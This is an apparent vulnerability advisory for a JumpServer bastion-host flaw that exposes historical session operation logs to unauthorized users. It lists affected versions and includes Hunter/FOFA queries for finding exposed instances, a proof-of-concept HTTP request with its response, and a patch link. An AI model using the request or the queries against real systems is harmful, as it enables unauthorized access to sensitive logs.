Article directory
Preface
There is a flaw in JumpServer's permission management that allows an unauthorized remote attacker to download all operation logs during historical session connections, which can lead to the leakage of sensitive information.
statement
Please do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article are the responsibility of the user himself. All adverse consequences and The author of the article is irrelevant. This article is for educational purposes only.
1. Introduction to JumpServer
JumpServer is an open source bastion host and permission management system used to manage and control remote server access permissions. It provides a secure way to manage and monitor access to target servers through JumpServer.
2. Vulnerability description
JumpServer is an open source bastion host and permission management system designed to help enterprises achieve secure management and access control of servers and network devices. A flaw in JumpServer's permission management allows an unauthorized remote attacker to download all operation logs during historical session connections. After analysis and judgment, the vulnerability is easy to exploit and can lead to the leakage of sensitive information.
3. Scope of influence
- 3.0.0 <= version <= 3.5.4
- 3.6.0 <= version <= 3.6.3
4. Asset search
hunter syntax: app.name="JumpServer"
FOFA:app="JumpServer-堡垒机"
5. Recurrence of vulnerabilities
Vulnerability POC
request package
GET /api/v1/terminal/sessions/ HTTP/1.1
Host: XX.XX.XX.XX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
Cookie: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX; jms_sessionid=tl4l16mf5x23mg0g2ku5npf2q2apru18
Connection: close
response packet
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 20 Sep 2023 02:09:54 GMT
Content-Type: application/json
Content-Length: 759031
Connection: close
Vary: Accept, Accept-Language, Cookie
Allow: GET, POST, PUT, PATCH, DELETE, HEAD, OPTIONS
X-Frame-Options: DENY
Content-Language: zh-hans
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
Set-Cookie: jms_sessionid=tl4l16mf5x23mg0g2ku5npf2q2apru18; HttpOnly; Path=/; SameSite=Lax
[{"id":"xxxx","user":"xxx",.....}]
6. Repair suggestions
The official fix plan has been released, and affected users are advised to contact the official to obtain the security patch. https://github.com/jumpserver/jumpserver/security/advisories/GHSA-633x-3f4f-v9rw